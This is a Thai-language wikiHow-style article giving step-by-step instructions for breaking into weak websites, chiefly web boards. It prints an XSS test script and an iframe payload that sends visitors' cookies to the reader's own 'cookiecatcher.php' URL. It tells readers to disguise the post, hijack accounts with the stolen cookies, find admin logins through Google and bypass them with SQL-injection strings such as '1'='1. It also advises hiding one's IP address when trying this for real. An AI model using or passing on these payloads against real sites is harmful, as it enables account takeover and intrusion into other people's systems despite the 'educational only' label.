ดาวน์โหลดบทความดาวน์โหลดบทความวิกิฮาวเป็น "wiki" ซึ่งหมายความว่าบทความหลายๆ บทความของเรานั้นเป็นการร่วมมือกันเขียนของผู้เขียนหลายคน ในการเขียนบทความชิ้นนี้ ผู้คน 93 คน ซึ่งบางคนไม่ขอเปิดเผยตัว ได้ร่วมกันเขียนและปรับปรุงเนื้อหาของบทความอย่างต่อเนื่อง
บทความนี้ถูกเข้าชม 86,015 ครั้ง
เรารู้ ว่าคุณก็อยากรู้ ว่าเขาแฮกเว็บไซต์กันยังไง แน่นอนว่าแฮกไม่ได้ทุกเว็บเสมอไป แต่ถ้าเว็บไหนหย่อนการรักษาความปลอดภัย ก็เป็นไปได้ เช่น พวกเว็บบอร์ด บทความวิกิฮาวนี้จะแนะนำวิธีการแฮกเว็บไซต์ให้คุณเอง โดยใช้ cross site scripting รวมถึง injection attacks ที่ล้วนแล้วแต่หาช่องโหว่แล้วเจาะเข้าไป นอกจากนี้ก็มีเคล็ดลับว่าจะแฮกให้เก่ง เขาทำกันยังไง
หมายเหตุ: ย้ำว่าบทความวิกิฮาวนี้มีเพื่อประโยชน์ในการศึกษาหาความรู้เท่านั้น ไม่ว่าจะสำหรับมือใหม่หัดแฮกแบบ white hat (เน้นป้องกันระบบ) หรือสำหรับคนที่อยากรู้ว่าการแฮกคืออะไร จะได้รักษาความปลอดภัยเว็บตัวเองได้ดีกว่าเดิม
ขั้นตอน
หาเว็บที่เจาะง่าย โพสต์เนื้อหาได้. เว็บบอร์ดนี่แหละตัวอย่างที่เห็นเด่นชัด เพราะถ้าเว็บไหนแน่นหนา ก็ใช้วิธีต่อไปนี้ไม่ได้ window.alert(“test”) window.alert(“test”)window.alert(“test”)
โพสต์เนื้อหาใหม่. ต้องพิมพ์โค้ดพิเศษใน “โพสต์” เพื่อใช้ดักข้อมูลของทุกคนที่คลิกเข้ามา- ต้องทดสอบว่าระบบกรองโค้ดออกหรือเปล่า โดยโพสต์
<script>window.alert(“test”)</script>
ถ้ามีหน้าต่าง alert โผล่มาตอนคลิกโพสต์ แสดงว่าเว็บนั่นอ่อน เจาะได้
- ต้องทดสอบว่าระบบกรองโค้ดออกหรือเปล่า โดยโพสต์
สร้างแล้วอัพโหลด cookie catcher. เป้าหมายของการเจาะ คือดักจับคุกกี้ของผู้ใช้ ให้คุณเข้าบัญชีของเขาในเว็บที่ระบบล็อกอินไม่แน่นหนานั้นได้ ที่ต้องใช้คือ cookie catcher สำหรับดักจับและเปลี่ยนเส้นทางคุกกี้ของเป้าหมาย ให้คุณอัพโหลด catcher เข้าเว็บเป้าหมายที่รองรับ php ยังไงลองค้นหาตัวอย่างโค้ดของ cookie catcher ในเน็ตเพิ่มเติมดู
โพสต์พร้อม cookie catcher. ให้ใส่โค้ดที่จำเป็นในโพสต์ เพื่อดักจับคุกกี้แล้วส่งไปที่เว็บคุณแทน คุณต้องพิมพ์บางข้อความต่อท้ายโค้ดเพื่อกลบเกลื่อน โพสต์ของคุณจะได้ไม่ผิดสังเกตจนถูกลบ- โค้ดตัวอย่างก็ประมาณ
<iframe frameborder="0" height="0" width="0" src="javascript...:void(document.location='YOURURL/cookiecatcher.php?c=' document.cookie)></iframe>
- โค้ดตัวอย่างก็ประมาณ
ใช้คุกกี้ที่ดักจับมาได้. หลังจากนี้ คุณก็ใช้ข้อมูลในคุกกี้ที่เซฟลงเว็บคุณได้ตามสบายโฆษณา
หาเว็บที่เจาะง่าย. ต้องหาเว็บที่หย่อนความปลอดภัย พูดง่ายๆ คือระบบที่เจาะล็อกอินของแอดมินได้ง่าย ลอง search ใน Google ว่า admin login.asp ดู
ล็อกอินในฐานะแอดมินเว็บ. พิมพ์ admin แทน username แล้วใช้ตัวเลขใดตัวเลขหนึ่งของ string ที่ต่างกันออกไปเป็นรหัสผ่าน จะเป็นตัวเลขไหนก็ได้ แต่ที่พบบ่อยคือ 1’ หรือ ’1’='1 หรือ 2'='2
อดทน. เพราะต้องลองผิดลองถูกกันพักใหญ่
เจาะเว็บ. ในที่สุดคุณก็น่าจะหา string ที่ใช้ล็อกอินในฐานะแอดมินของเว็บได้ ถ้าเว็บนั้นหย่อนการรักษาความปลอดภัยโฆษณา
เรียนภาษาเขียนโปรแกรม 1 - 2 ภาษา. ถ้าอยากแฮกเว็บให้เป็นให้เก่ง ก็ต้องรู้ว่าคอมพิวเตอร์และเทคโนโลยีอื่นๆ นั้นทำงานยังไง ให้หัดใช้ภาษาเขียนโปรแกรม เช่น Python หรือ SQL จะได้ควบคุมดูแลคอมของตัวเองได้ดียิ่งขึ้น เห็นช่องโหว่ในระบบ
รู้ HTML พื้นฐานไว้บ้าง. บางเว็บจะแฮกได้ต้องมีความรู้เรื่อง html กับ javascript มากเป็นพิเศษ เป็นอะไรที่ต้องใช้เวลา แต่หาข้อมูลได้เยอะแยะในเน็ตแบบฟรีๆ ขอแค่ขยันและตั้งใจจริง
ปรึกษา whitehats. Whitehats ก็คือแฮกเกอร์ฝ่ายธรรมะ แฮกเพื่อทำประโยชน์ หาช่องโหว่ในระบบรักษาความปลอดภัยเพื่อแก้ไขและป้องกัน ทำสังคมเน็ตให้น่าอยู่กว่าเดิม ถ้าอยากเรียนรู้เทคนิคการแฮกในทางที่ถูกที่ควร หรืออยากปกป้องเว็บตัวเอง ก็ลองปรึกษา ขอคำแนะนำจาก whitehats รุ่นพี่ดู
ค้นคว้าเพิ่มเติมเรื่องการแฮก. ถ้าอยากรู้ลึกรู้จริงเรื่องการแฮก หรืออย่างน้อยๆ ก็แค่อยากทำระบบของคอมหรือเว็บตัวเองให้แน่นหนา ก็ต้องหมั่นศึกษาหาความรู้ เพราะมีหลายปัจจัยเลยที่ทำให้เกิดช่องโหว่ในระบบ แถมภัยต่างๆ และมิจฉาชีพในโลกไซเบอร์ก็เปลี่ยนแปลง พัฒนาตัวเองอยู่ตลอด คุณต้องรู้เท่าทัน
อย่าตกข่าว. อย่างที่บอกว่าโลกของแฮกเกอร์นั้นเปลี่ยนแปลงและอัพเดทอยู่ตลอดตามเทคโนโลยี คุณต้องหมั่นอัพเดททั้งความรู้และข่าวสาร ถ้ามัวแต่เฝ้าระวังจุดเดิม คราวหน้าอาจถูกแฮกช่องโหว่ใหม่ก็ได้!โฆษณา
เคล็ดลับ
- ลองเข้าเว็บบอร์ดหรือชุมชมแฮกเกอร์ต่างๆ จะได้รู้เคล็ดลับและข่าวสารใหม่ๆ
- ย้ำกันอีกทีว่าบทความวิกิฮาวนี้มีเพื่อประโยชน์ในการศึกษาหาความรู้เท่านั้น ทั้งสำหรับมือใหม่หัดแฮกแบบ white hat (เน้นป้องกันระบบ) และคนที่อยากรักษาความปลอดภัยเว็บตัวเองได้ดีกว่าเดิม
คำเตือน
- แค่อ่านบทความนี้จบก็ใช่ว่าจะกลายเป็นแฮกเกอร์ได้เลย "ต้อง" รู้จักเพิ่มพูนความรู้ ฝึกฝนทักษะ และติดตามข่าวสารด้วย
- เวลาทดลองแฮกจริง ควรปกปิด IP address ของตัวเองด้วยโปรแกรมที่เกี่ยวข้อง ลองค้นหาในเน็ตดู
เกี่ยวกับวิกิฮาวนี้
บทความนี้เป็นประโยชน์กับคุณไหม
⚠️ Disclaimer:
Content from Wiki How ไท language website. Text is available under the Creative Commons Attribution-Share Alike License; additional terms may apply.
Wiki How does not encourage the violation of any laws, and cannot be responsible for any violations of such laws, should you link to this domain, or use, reproduce, or republish the information contained herein.
- - A few of these subjects are frequently censored by educational, governmental, corporate, parental and other filtering schemes.
- - Some articles may contain names, images, artworks or descriptions of events that some cultures restrict access to
- - Please note: Wiki How does not give you opinion about the law, or advice about medical. If you need specific advice (for example, medical, legal, financial or risk management), please seek a professional who is licensed or knowledgeable in that area.
- - Readers should not judge the importance of topics based on their coverage on Wiki How, nor think a topic is important just because it is the subject of a Wiki article.
